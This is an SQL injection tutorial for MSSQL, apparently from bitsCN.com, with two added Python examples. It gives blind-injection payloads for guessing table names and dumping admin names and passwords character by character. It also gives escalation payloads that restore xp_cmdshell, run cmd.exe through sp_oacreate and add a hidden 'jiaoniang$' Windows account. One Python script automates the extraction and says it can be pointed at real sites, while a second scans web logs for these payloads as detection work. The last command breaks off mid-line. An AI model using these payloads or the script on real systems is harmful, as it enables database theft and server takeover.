Common SQL injection statements explained (bitsCN.com)
SQL injection statements (MSSQL, boolean-based blind injection; a request returns either the normal page or an error page)
1. Determine whether an injection point exists. A lone single quote should break the query; "and 1=1" should return the normal page and "and 1=2" a different or error page.
'
and 1=1
and 1=2
2. Guess the table name. Common names are admin, adminuser, user, pass, password, ... A reference to a table that does not exist is a SQL error, so the error page means "no such table".
and 0<>(select count(*) from <table name>)
and 0<>(select count(*) from admin)   --- determine whether the admin table exists
3. Count the accounts. If "0 <" returns the normal page there is at least one row; if "1 <" then returns the error page, the number of accounts is exactly 1.
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4. Guess the column names by putting the expected column name inside len(). A column that does not exist is a SQL error; the "1 =" comparisons below rely on the table having exactly one row (step 3).
and 1=(select count(*) from admin where len(<column name>)>0)--
and 1=(select count(*) from admin where len(<user column name>)>0)
and 1=(select count(*) from admin where len(<password column name>)>0)
5. Guess the length of each column value. Start the threshold at 0 and raise it until the page flips from normal to error.
and 1=(select count(*) from admin where len(<column name>)>0)
and 1=(select count(*) from admin where len(name)>6)        --- error
and 1=(select count(*) from admin where len(name)>5)        --- normal, so the length is 6
and 1=(select count(*) from admin where len(name)=6)        --- normal
and 1=(select count(*) from admin where len(password)>11)   --- normal
and 1=(select count(*) from admin where len(password)>12)   --- error, so the length is 12
and 1=(select count(*) from admin where len(password)=12)   --- normal
6. Guess the characters
and 1=(select count(*) from admin where left(name,1)='a')    --- guess the first character of the account
and 1=(select count(*) from admin where left(name,2)='ab')   --- the first two characters of the account
Extend the prefix by one character per round, up to the length found in step 5, and the whole account name is recovered.
and 1=(select top 1 count(*) from Admin where asc(mid(pass,5,1))=51)--
This form tests a single position (here the 5th character of pass) against a character code; 51 is the code of '3'. asc() and mid() are Access/Jet functions rather than T-SQL (the MSSQL equivalents are ascii() and substring()). Replacing the number with the character code of a Chinese character lets you guess Chinese user names and passwords the same way, converting each matched code back to its character.
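Steps 1 to 6 above form one blind, boolean-based procedure: every request yields only "normal page" or "error page", and the data is inferred from that single bit. The Python script below is an added example, not code from the original page. It automates the procedure against a constructed in-memory SQLite stand-in for the target (assumed tables news and admin, with one admin row whose name and password have the lengths 6 and 12 used above), so it runs offline. Because the stand-in is SQLite, the MSSQL functions on the page are mapped to their SQLite equivalents: len to length, left/mid to substr, asc to unicode, top 1 to limit 1. It goes beyond the page in one respect: lengths and character codes are found by binary search on "mid < expr" comparisons (about 7 to 8 requests per value) instead of one request per candidate, and it finishes by showing that the same probes fail against a parameterized handler.

```python
import sqlite3


def make_target():
    """Constructed stand-in for the target site: a public news table and a
    hidden admin table with one row (the page's example has one account)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT);
        INSERT INTO news VALUES (1, 'hello');
        CREATE TABLE admin(name TEXT, password TEXT);
        INSERT INTO admin VALUES ('abcdef', 's3cr3tp4ss12');
    """)
    return con


def page_ok(con, injection):
    """Vulnerable handler: concatenates the attacker's suffix into the WHERE
    clause. True means the page rendered normally (a row came back); False
    means an empty result or a SQL error. That bit is all a blind attacker sees."""
    sql = "SELECT title FROM news WHERE id=1 " + injection
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def page_ok_safe(con, user_input):
    """Hardened handler: the input is bound as a parameter, so it is a value,
    never part of the SQL text."""
    try:
        row = con.execute("SELECT title FROM news WHERE id=?", (user_input,)).fetchone()
        return row is not None
    except sqlite3.Error:
        return False


# Step 1: an injection point exists when "and 1=1" and "and 1=2" differ.
def injectable(oracle):
    return oracle("and 1=1") and not oracle("and 1=2")


# Step 2: a reference to a missing table raises an error (the error page).
def table_exists(oracle, table):
    return oracle(f"and 0<>(select count(*) from {table})")


# Step 3: raise the threshold until "n < count(*)" turns false; n is the count.
def row_count(oracle, table, limit=100):
    n = 0
    while n < limit and oracle(f"and {n}<(select count(*) from {table})"):
        n += 1
    return n


# Step 4: a reference to a missing column raises an error as well.
def column_exists(oracle, table, col):
    return oracle(f"and 0<=(select count(*) from {table} where length({col})>=0)")


def _bisect(oracle, expr, lo, hi):
    """Recover the integer value of a SQL expression by binary search on
    "mid < expr". Invariant: lo <= value <= hi."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"and {mid}<({expr})"):
            lo = mid + 1
        else:
            hi = mid
    return lo


# Step 5: value length of the first row (SQLite "limit 1" stands in for "top 1").
def field_length(oracle, table, col, max_len=64):
    return _bisect(oracle, f"select length({col}) from {table} limit 1", 0, max_len)


# Step 6: one character at 1-based position pos, assumed to be an 8-bit code.
def char_at(oracle, table, col, pos):
    expr = f"select unicode(substr({col},{pos},1)) from {table} limit 1"
    return chr(_bisect(oracle, expr, 0, 255))


def dump_field(oracle, table, col):
    n = field_length(oracle, table, col)
    return "".join(char_at(oracle, table, col, i) for i in range(1, n + 1))


if __name__ == "__main__":
    con = make_target()
    oracle = lambda inj: page_ok(con, inj)
    print("injectable:", injectable(oracle))
    print("admin table:", table_exists(oracle, "admin"), "rows:", row_count(oracle, "admin"))
    for col in ("name", "password"):
        print(col, "=", dump_field(oracle, "admin", col))
    safe = lambda inj: page_ok_safe(con, "1 " + inj)
    print("injectable through the parameterized handler:", injectable(safe))
```

The oracle is a plain callable taking the injected suffix, so replacing it with an HTTP request that compares the response against the known "normal" page turns the script into the real blind extraction loop; the request count per character is then what you pay, which is why the binary search matters.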
Check the server version and patch level. Comparing the integer 1 with the varchar returned by @@version causes a conversion error, and the error page echoes the version string, which shows the service pack (e.g. SP4) that is installed.
and 1=(select @@version)--
Check the permissions of the login the application connects with. A normal page means is_srvrolemember returned 1, i.e. the login is a member of the sysadmin server role.
and 1=(select is_srvrolemember('sysadmin'))--
Determine which login the application connects with (a normal page from the first statement proves the connection uses sa; the next two test the database user name).
and 'sa'=(select system_user)--
and user_name()='dbo'--
and 0<>(select user_name())--
Check whether xp_cmdshell has been dropped (xtype 'X' is an extended stored procedure in sysobjects)
and 1=(select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell')--
Restore xp_cmdshell after it has been dropped by re-registering its DLL; an absolute path to the DLL is also accepted.
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\inetpub\wwwroot\xplog70.dll'--
Reverse ping test: make the server ping your own host through OLE automation (sp_oacreate/sp_oamethod), and watch for the ICMP packets to confirm that commands execute.
;use master;declare @s int;exec sp_oacreate 'wscript.shell',@s out;exec sp_oamethod @s,'run',NULL,'cmd.exe /c ping 192.168.0.1';--
Add an account (user jiaoniang$ with password 1866574; the trailing $ keeps it out of "net user" listings)
;declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user jiaoniang$ 1866574 /add'--
Create a virtual directory for the E: drive by running mkwebdir.vbs through the same wscript.shell object:
;declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -
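The statements from "Check the server version" onward (the @@version and is_srvrolemember probes, the xp_cmdshell check and its restoration through sp_addextendedproc, and the sp_oacreate/sp_oamethod command chain) are distinctive strings that arrive in the request URL. As an added example, not from the original page, the Python scanner below URL-decodes each request's query string and flags those payloads in web server logs. The log layout (space-separated date, time, client IP, method, URI, query string, status), the sample lines and the signature names are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures taken from the payloads listed on this page: version and privilege
# probes, xp_cmdshell, its restoration via sp_addextendedproc, the
# sp_oacreate/sp_oamethod command chain, and stacked queries in general.
SIGNATURES = {
    "version_probe":  re.compile(r"@@version", re.I),
    "role_probe":     re.compile(r"is_srvrolemember\s*\(", re.I),
    "login_probe":    re.compile(r"\b(system_user|user_name\s*\(\s*\))", re.I),
    "xp_cmdshell":    re.compile(r"xp_cmdshell", re.I),
    "restore_xp":     re.compile(r"sp_addextendedproc", re.I),
    "ole_automation": re.compile(r"sp_oa(create|method)\b", re.I),
    "stacked_query":  re.compile(r";\s*(exec|declare|use)\b", re.I),
}


def normalize(query_string):
    """Decode %xx and '+' twice (catches one level of double encoding) and
    collapse whitespace, so the regexes see roughly what the database sees."""
    text = unquote_plus(unquote_plus(query_string))
    return re.sub(r"\s+", " ", text)


def scan_query(raw_query):
    """Return the sorted signature names matching one raw query string."""
    text = normalize(raw_query)
    return sorted(tag for tag, rx in SIGNATURES.items() if rx.search(text))


def scan_log(lines):
    """Scan constructed W3C-style lines 'date time client-ip method uri query status'
    (an assumed layout) and return (line number, client ip, tags) for each hit."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        fields = line.split()
        if len(fields) < 7:
            continue  # malformed line: skip rather than guess at its fields
        client_ip, query = fields[2], fields[5]
        tags = scan_query(query)
        if tags:
            hits.append((lineno, client_ip, tags))
    return hits


# Constructed sample log, not real traffic; the payloads mirror the page's examples.
SAMPLE_LOG = [
    "2003-05-12 10:01:02 10.0.0.5 GET /news.asp id=1 200",
    "2003-05-12 10:01:09 10.0.0.5 GET /news.asp id=1%20and%201=(select%20@@version)-- 500",
    "2003-05-12 10:01:15 10.0.0.5 GET /news.asp id=1%20and%201=(select%20is_srvrolemember('sysadmin'))-- 200",
    "2003-05-12 10:02:01 10.0.0.5 GET /news.asp id=1;exec%20master.dbo.sp_addextendedproc%20'xp_cmdshell','xplog70.dll'-- 200",
    "2003-05-12 10:02:30 10.0.0.5 GET /news.asp id=1;declare%20@s%20int%20exec%20sp_oacreate%20'wscript.shell',@s%20out%20exec%20sp_oamethod%20@s,'run',NULL,'cmd.exe%20/c%20ping%20192.168.0.1'-- 200",
    "2003-05-12 10:03:00 10.0.0.5 GET /news.asp id=1%2520and%25201%3D(select%2520%40%40version)-- 500",
]


if __name__ == "__main__":
    for lineno, ip, tags in scan_log(SAMPLE_LOG):
        print(f"line {lineno} from {ip}: {', '.join(tags)}")
```

The decode-twice step is what catches the last sample line, where the payload was percent-encoded a second time; the first pass turns it back into the single-encoded form and the second pass into the text the database would parse. Matching on the decoded text, not the raw URL, is the point of the example.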